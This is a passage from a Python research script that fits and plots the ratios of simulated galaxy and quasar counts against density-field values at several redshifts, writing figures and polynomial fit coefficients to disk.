p.savefig(join(mockDir,"plots","fit-QSO-z15-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('QSO')#+str(n.round(ps,5)))
p.plot(xb, (N0qsoz15/N0z15)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=1.5')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-QSO-z15-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-QSO-z15.data",ps)
########## FIT z=0.8 LRG
NR = 5
N0z08R = n.array([N0z08[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz08R = binsz08[::NR]
N0lrgz08R = n.array([N0lrgz08[ii::NR] for ii in range(NR)]).sum(axis=0)
N0lrgz08R_sig = n.array([N0lrgz08[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz08R[1:]+binsz08R[:-1])/2.
dxR = binsz08R[1:] - binsz08R[:-1]
# relative error on y in percentage
errPoisson = N0lrgz08T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0lrgz08T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0lrgz08R_sig)
ok = (N0lrgz08>0)&(N0z08>0)&(N0lrgz08/N0z08>-6)#&(xb>10**2)
y = n.log10(N0lrgz08[ok]/N0z08[ok])
yplus = n.log10((N0lrgz08[ok] + errorsP(xb[ok])*N0lrgz08[ok] )/N0z08[ok])
yminus = n.log10((N0lrgz08[ok] - errorsP(xb[ok])*N0lrgz08[ok] )/N0z08[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
p.figure(0)
p.title('LRG ')#+str(ps))
p.plot(xb, N0lrgz08/N0z08,'kx', rasterized=True, label='z=0.8')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2, label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-LRG-z08-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('LRG')#+str(n.round(ps,5)))
p.plot(xb, (N0lrgz08/N0z08)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=0.8')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-LRG-z08-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-LRG-z08.data",ps)
########## FIT z=0.8 QSO
NR = 5
N0z08R = n.array([N0z08[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz08R = binsz08[::NR]
N0qsoz08R = n.array([N0qsoz08[ii::NR] for ii in range(NR)]).sum(axis=0)
N0qsoz08R_sig = n.array([N0qsoz08[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz08R[1:]+binsz08R[:-1])/2.
dxR = binsz08R[1:] - binsz08R[:-1]
# relative error on y in percentage
errPoisson = N0qsoz08T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0qsoz08T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0qsoz08R_sig)
ok = (N0qsoz08>0)&(N0z08>0)&(N0qsoz08/N0z08>-6)#&(xb>10**2)
y = n.log10(N0qsoz08[ok]/N0z08[ok])
yplus = n.log10((N0qsoz08[ok] + errorsP(xb[ok])*N0qsoz08[ok] )/N0z08[ok])
yminus = n.log10((N0qsoz08[ok] - errorsP(xb[ok])*N0qsoz08[ok] )/N0z08[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
p.figure(0)
p.title('QSO ')#+str(ps))
p.plot(xb, N0qsoz08/N0z08,'kx', rasterized=True, label='z=0.8')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2,label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-QSO-z08-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('QSO')#+str(n.round(ps,5)))
p.plot(xb, (N0qsoz08/N0z08)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=0.8')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-QSO-z08-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-QSO-z08.data",ps)
########## FIT z=0.8 ELG
NR = 5
N0z08R = n.array([N0z08[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz08R = binsz08[::NR]
N0elgz08R = n.array([N0elgz08[ii::NR] for ii in range(NR)]).sum(axis=0)
N0elgz08R_sig = n.array([N0elgz08[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz08R[1:]+binsz08R[:-1])/2.
dxR = binsz08R[1:] - binsz08R[:-1]
# relative error on y in percentage
errPoisson = N0elgz08T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0elgz08T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0elgz08R_sig)
ok = (N0elgz08>0)&(N0z08>0)&(N0elgz08/N0z08>-6)#&(xb>10**2)
y = n.log10(N0elgz08[ok]/N0z08[ok])
yplus = n.log10((N0elgz08[ok] + errorsP(xb[ok])*N0elgz08[ok] )/N0z08[ok])
yminus = n.log10((N0elgz08[ok] - errorsP(xb[ok])*N0elgz08[ok] )/N0z08[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
p.figure(0)
p.title('ELG ')#+str(ps))
p.plot(xb, N0elgz08/N0z08,'kx', rasterized=True, label='z=0.8')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2,label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-ELG-z08-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('ELG')#+str(n.round(ps,5)))
p.plot(xb, (N0elgz08/N0z08)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=0.8')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-ELG-z08-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-ELG-z08.data",ps)
sys.exit()
########## FIT z=0.7 LRG
NR = 5
N0z07R = n.array([N0z07[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz07R = binsz07[::NR]
N0lrgz07R = n.array([N0lrgz07[ii::NR] for ii in range(NR)]).sum(axis=0)
N0lrgz07R_sig = n.array([N0lrgz07[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz07R[1:]+binsz07R[:-1])/2.
dxR = binsz07R[1:] - binsz07R[:-1]
# relative error on y in percentage
errPoisson = N0lrgz07T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0lrgz07T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0lrgz07R_sig)
ok = (N0lrgz07>0)&(N0z07>0)&(N0lrgz07/N0z07>-6)#&(xb>10**2)
y = n.log10(N0lrgz07[ok]/N0z07[ok])
yplus = n.log10((N0lrgz07[ok] + errorsP(xb[ok])*N0lrgz07[ok] )/N0z07[ok])
yminus = n.log10((N0lrgz07[ok] - errorsP(xb[ok])*N0lrgz07[ok] )/N0z07[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
p.figure(0)
p.title('LRG ')#+str(ps))
p.plot(xb, N0lrgz07/N0z07,'kx', rasterized=True, label='z=0.7')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2, label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-LRG-z07-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('LRG')#+str(n.round(ps,5)))
p.plot(xb, (N0lrgz07/N0z07)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=0.7')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-LRG-z07-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-LRG-z07.data",ps)
########## FIT z=0.7 QSO
NR = 5
N0z07R = n.array([N0z07[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz07R = binsz07[::NR]
N0qsoz07R = n.array([N0qsoz07[ii::NR] for ii in range(NR)]).sum(axis=0)
N0qsoz07R_sig = n.array([N0qsoz07[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz07R[1:]+binsz07R[:-1])/2.
dxR = binsz07R[1:] - binsz07R[:-1]
# relative error on y in percentage
errPoisson = N0qsoz07T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0qsoz07T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0qsoz07R_sig)
ok = (N0qsoz07>0)&(N0z07>0)&(N0qsoz07/N0z07>-6)#&(xb>10**2)
y = n.log10(N0qsoz07[ok]/N0z07[ok])
yplus = n.log10((N0qsoz07[ok] + errorsP(xb[ok])*N0qsoz07[ok] )/N0z07[ok])
yminus = n.log10((N0qsoz07[ok] - errorsP(xb[ok])*N0qsoz07[ok] )/N0z07[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
p.figure(0)
p.title('QSO ')#+str(ps))
p.plot(xb, N0qsoz07/N0z07,'kx', rasterized=True, label='z=0.7')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2,label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-QSO-z07-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('QSO')#+str(n.round(ps,5)))
p.plot(xb, (N0qsoz07/N0z07)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=0.7')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-QSO-z07-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-QSO-z07.data",ps)
########## FIT z=0.7 ELG
NR = 5
N0z07R = n.array([N0z07[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz07R = binsz07[::NR]
N0elgz07R = n.array([N0elgz07[ii::NR] for ii in range(NR)]).sum(axis=0)
N0elgz07R_sig = n.array([N0elgz07[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz07R[1:]+binsz07R[:-1])/2.
dxR = binsz07R[1:] - binsz07R[:-1]
# relative error on y in percentage
errPoisson = N0elgz07T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0elgz07T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0elgz07R_sig)
ok = (N0elgz07>0)&(N0z07>0)&(N0elgz07/N0z07>-6)#&(xb>10**2)
y = n.log10(N0elgz07[ok]/N0z07[ok])
yplus = n.log10((N0elgz07[ok] + errorsP(xb[ok])*N0elgz07[ok] )/N0z07[ok])
yminus = n.log10((N0elgz07[ok] - errorsP(xb[ok])*N0elgz07[ok] )/N0z07[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
p.figure(0)
p.title('ELG ')#+str(ps))
p.plot(xb, N0elgz07/N0z07,'kx', rasterized=True, label='z=0.7')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2,label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-ELG-z07-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('ELG')#+str(n.round(ps,5)))
p.plot(xb, (N0elgz07/N0z07)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=0.7')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-ELG-z07-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-ELG-z07.data",ps)
sys.exit()
#########################################
#########################################
#########################################
#Z=0.8
#########################################
#########################################
#########################################
#########################################
#########################################
#########################################
#Z=0.8
#########################################
#########################################
#########################################
inGal = n.array([ "Box_HAM_z1.480160_nbar1.930000e-05_QSO.DF.fits.gz" ])
inGal = n.array([ "Box_HAM_z0.818843_nbar1.680000e-05_QSO.DF.fits.gz", "Box_HAM_z0.818843_nbar3.200000e-04_ELG.DF.fits.gz" ])
Hqso, N0qso, N1qso = getNN(join( mockDir,inGal[0]))
Helg, N0elg, N1elg = getNN(join( mockDir,inGal[1]))
xs, Hs = smooth(H)
xs, Hselg = smooth(Helg)
xs, Hsqso = smooth(Hqso)
X, Y = n.meshgrid(xb[::4], xb[::4]) #xs,xs)
n.savetxt(join(mockDir,"grid-x-z08.data"), X)
n.savetxt(join(mockDir,"grid-y-z08.data"), Y)
Z = Hsqso.astype('float')/Hs
bad = (Z<0)|(n.isnan(Z))|(Z==n.inf)
Z[bad]=n.zeros_like(Z)[bad]
n.savetxt(join(mockDir,"qso-z08.data"), Z)
Z = Hselg.astype('float')/Hs
bad = (Z<0)|(n.isnan(Z))|(Z==n.inf)
Z[bad]=n.zeros_like(Z)[bad]
n.savetxt(join(mockDir,"elg-z08.data"), Z)
Z=n.log10(Hsqso.astype('float')/Hs)
p.figure(1, figsize=(8, 8))
p.contourf(X, Y, Z)#, levels=n.arange(-3,0.26,0.25))
cb = p.colorbar()
cb.set_label(r'log(N(QSO)/N(all))')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$\delta_0$')
p.ylim((0.1, 5000))
p.xlim((0.1, 5000))
p.xscale('log')
p.yscale('log')
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-HDF1-z08-qso.png"))
p.clf()
Z=n.log10(Hselg.astype('float')/Hs)
p.figure(1, figsize=(8, 8))
p.contourf(X, Y, Z)#, levels=n.arange(-3,0.26,0.25))
cb = p.colorbar()
cb.set_label(r'log(N(ELG)/N(all))')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$\delta_0$')
p.ylim((0.1, 5000))
p.xlim((0.1, 5000))
p.xscale('log')
p.yscale('log')
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-HDF1-z08-elg.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N0qso/N0,'gx', rasterized=True, label='QSO ')
p.plot(xb, N0elg/N0,'bx', rasterized=True, label='ELG ')
p.plot(xb, 5e-6 * xb**(2.1), 'k--' , label=r'$5\times10^{-6}\delta_0^{2.1}$')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N/ N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-8, 1e1))
p.xlim((0.01, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-z08-ratio.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N1qso/N1,'gx', rasterized=True, label='QSO ')
p.plot(xb, N1elg/N1,'bx', rasterized=True, label='ELG ')
p.plot(xb, 5e-6 * xb**(2.1), 'k--' , label=r'$5\times10^{-6}\delta_0^{2.1}$')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_1$')
p.ylabel(r'N/ N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-8, 1e1))
p.xlim((0.01, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF1-z08-ratio.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N0,'kx', rasterized=True, label=r'MDPL 2048$^3$')
p.plot(xb, N0qso,'gx', rasterized=True, label='QSO ')
p.plot(xb, N0elg,'bx', rasterized=True, label='ELG ')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'$N/Mpc3/d\delta$')
p.xscale('log')
p.yscale('log')
p.ylim((1e-11, 1e2))
p.xlim((0.01, 1e4))
gl = p.legend()
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-z08.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N1,'kx', rasterized=True, label=r'MDPL 2048$^3$')
p.plot(xb, N1qso,'gx', rasterized=True, label='QSO ')
p.plot(xb, N1elg,'bx', rasterized=True, label='ELG ')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$N/Mpc3/d\delta$')
p.xscale('log')
p.yscale('log')
p.ylim((1e-11, 1e2))
p.xlim((0.01, 1e4))
gl = p.legend()
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF1-z08.png"))
p.clf()
#########################################
#########################################
#########################################
#Z=0.7
#########################################
#########################################
#########################################
inGal = n.array([ "Box_HAM_z0.818843_nbar1.000000e-04_LRG.DF.fits.gz", "Box_HAM_z0.818843_nbar1.680000e-05_QSO.DF.fits.gz", "Box_HAM_z0.818843_nbar3.200000e-04_ELG.DF.fits.gz" ])
Hlrg, N0lrg, N1lrg = getNN(join( mockDir,inGal[0]))
Hqso, N0qso, N1qso = getNN(join( mockDir,inGal[1]))
Helg, N0elg, N1elg = getNN(join( mockDir,inGal[2]))
xs, Hs = smooth(H)
xs, Hslrg = smooth(Hlrg)
xs, Hselg = smooth(Helg)
xs, Hsqso = smooth(Hqso)
X, Y = n.meshgrid(xb[::4], xb[::4]) #xs,xs)
n.savetxt(join(mockDir,"grid-x-z07.data"), X)
n.savetxt(join(mockDir,"grid-y-z07.data"), Y)
Z = Hsqso.astype('float')/Hs
bad = (Z<0)|(n.isnan(Z))|(Z==n.inf)
Z[bad]=n.zeros_like(Z)[bad]
n.savetxt(join(mockDir,"qso-z07.data"), Z)
Z = Hslrg.astype('float')/Hs
bad = (Z<0)|(n.isnan(Z))|(Z==n.inf)
Z[bad]=n.zeros_like(Z)[bad]
n.savetxt(join(mockDir,"lrg-z07.data"), Z)
Z = Hselg.astype('float')/Hs
bad = (Z<0)|(n.isnan(Z))|(Z==n.inf)
Z[bad]=n.zeros_like(Z)[bad]
n.savetxt(join(mockDir,"elg-z07.data"), Z)
Z=n.log10(Hsqso.astype('float')/Hs)
p.figure(1, figsize=(8, 8))
p.contourf(X, Y, Z)#, levels=n.arange(-3,0.26,0.25))
cb = p.colorbar()
cb.set_label(r'log(N(QSO)/N(all))')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$\delta_0$')
p.ylim((0.1, 5000))
p.xlim((0.1, 5000))
p.xscale('log')
p.yscale('log')
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-HDF1-z07-qso.png"))
p.clf()
Z=n.log10(Hselg.astype('float')/Hs)
p.figure(1, figsize=(8, 8))
p.contourf(X, Y, Z)#, levels=n.arange(-3,0.26,0.25))
cb = p.colorbar()
cb.set_label(r'log(N(ELG)/N(all))')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$\delta_0$')
p.ylim((0.1, 5000))
p.xlim((0.1, 5000))
p.xscale('log')
p.yscale('log')
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-HDF1-z07-elg.png"))
p.clf()
Z=n.log10(Hslrg.astype('float')/Hs)
p.figure(1, figsize=(8, 8))
p.contourf(X, Y, Z)#, levels=n.arange(-3,0.26,0.25))
cb = p.colorbar()
cb.set_label(r'log(N(LRG)/N(all))')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$\delta_0$')
p.ylim((0.1, 5000))
p.xlim((0.1, 5000))
p.xscale('log')
p.yscale('log')
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-HDF1-z07-lrg.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N0qso/N0,'gx', rasterized=True, label='QSO ')
p.plot(xb, N0lrg/N0,'rx', rasterized=True, label='LRG ')
p.plot(xb, N0elg/N0,'bx', rasterized=True, label='ELG ')
p.plot(xb, 5e-6 * xb**(2.1), 'k--' , label=r'$5\times10^{-6}\delta_0^{2.1}$')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N/ N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-8, 1e1))
p.xlim((0.01, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-z07-ratio.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N1qso/N1,'gx', rasterized=True, label='QSO ')
p.plot(xb, N1lrg/N1,'rx', rasterized=True, label='LRG ')
p.plot(xb, N1elg/N1,'bx', rasterized=True, label='ELG ')
p.plot(xb, 5e-6 * xb**(2.1), 'k--' , label=r'$5\times10^{-6}\delta_0^{2.1}$')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_1$')
p.ylabel(r'N/ N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-8, 1e1))
p.xlim((0.01, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF1-z07-ratio.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N0,'kx', rasterized=True, label=r'MDPL 2048$^3$')
p.plot(xb, N0qso,'gx', rasterized=True, label='QSO ')
p.plot(xb, N0lrg,'rx', rasterized=True, label='LRG ')
p.plot(xb, N0elg,'bx', rasterized=True, label='ELG ')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'$N/Mpc3/d\delta$')
p.xscale('log')
p.yscale('log')
p.ylim((1e-11, 1e2))
p.xlim((0.01, 1e4))
gl = p.legend()
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-z07.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N1,'kx', rasterized=True, label=r'MDPL 2048$^3$')
p.plot(xb, N1qso,'gx', rasterized=True, label='QSO ')
p.plot(xb, N1lrg,'rx', rasterized=True, label='LRG ')
p.plot(xb, N1elg,'bx', rasterized=True, label='ELG ')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$N/Mpc3/d\delta$')
p.xscale('log')
p.yscale('log')
p.ylim((1e-11, 1e2))
p.xlim((0.01, 1e4))
gl = p.legend()
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF1-z07.png"))
p.clf()
sys.exit()
# definitions for the axes
left, width = 0.1, 0.65
bottom, height = 0.1, 0.65
bottom_h = left_h = left + width + 0.02
rect_scatter = [left, bottom, width, height]
rect_histx = [left, bottom_h, width, 0.2]
rect_histy = [left_h, bottom, 0.2, height]
# start with a rectangular Figure
p.figure(1, figsize=(8, 8))
p.contourf(X, Y, proba)
p.xlabel('DF N1')
p.ylabel('DF')
p.xscale('log')
p.yscale('log')
p.show()
p.figure(1, figsize=(8, 8))
axScatter = p.axes(rect_scatter)
axScatter.set_yscale('log')
axScatter.set_xscale('log')
extent = [yedges[0], yedges[-1], xedges[0], xedges[-1]]
levels = (0.01, 0.1, 0.5, 1)
cset = p.contour(X, Y, proba, levels, origin='lower',colors=['black','green','blue','red'],linewidths=(1.9, 1.6, 1.5, 1.4),extent=extent)
p.clabel(cset, inline=1, fontsize=10, fmt='%1.0i')
for c in cset.collections:
c.set_linestyle('solid')
p.xlabel('DF N1')
p.ylabel('DF')
axHistx = p.axes(rect_histx)
axHisty = p.axes(rect_histy)
# no labels
axHistx.xaxis.set_major_formatter(nullfmt)
axHisty.yaxis.set_major_formatter(nullfmt)
# the scatter plot:
axHistx.plot(xb, HDF1, 'k')
axHistx.plot(xb, HDF1qso, 'b')
axHistx.set_yscale('log')
axHistx.set_xscale('log')
axHisty.plot(HDF0, xb, 'r')  # plot() has no orientation keyword; swap x and y to draw the marginal horizontally
axHisty.plot(HDF0qso, xb, 'g')
axHisty.set_yscale('log')
p.show()
p.imshow(n.log10(proba))
p.colorbar()
p.show()
dxAll = binsAll[1:] - binsAll[:-1]
xAll = (binsAll[1:]*binsAll[:-1])**0.5
NAll = result /dxAll / 1000**3.
nqso, binQSO = n.histogram(hd['DF'], bins= n.logspace(-1.5,4,80))
dxQso = binQSO[1:] - binQSO[:-1]
xQSO = (binQSO[1:]*binQSO[:-1])**0.5
NQSO = nqso /dxQso / 1000**3.
p.figure(0)
p.title('z=0.7')
p.plot(xAll, NAll,'kx', rasterized=True, label='MD Planck 1Gpc mesh 2048 cube')
p.plot(xQSO, NQSO,'bx', rasterized=True, label='QSO ')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta$')
p.ylabel(r'$N/Mpc3/d\delta$')
p.xscale('log')
p.yscale('log')
p.legend(loc= 3)
p.grid()
p.savefig(join(mockDir,"plots","delta-numberdensity-z07-fit.png"))
p.clf()
#################################################
#################################################
# delta - vmax relation
#################################################
#################################################
# for each bin in delta compute vmax mean and its std
pcs = [0, 1, 10, 20, 30, 40, 50, 60, 70, 80, 90, 99, 100]
bins = n.hstack((0,n.logspace(-3, 4, 60)))
vmaxBar = n.empty(len(bins)-1)
vmaxStd = n.empty(len(bins)-1)
distrib = n.empty((len(bins)-1, len(pcs)))
Nbins = 10
bbs = n.empty((len(bins)-1, Nbins+1))
N = n.empty((len(bins)-1, Nbins))
for ii in range(len(bins)-1):
sel = (hd['DF']>bins[ii]) & (hd['DF']<bins[ii+1])
y = hd['Vmax'][sel]
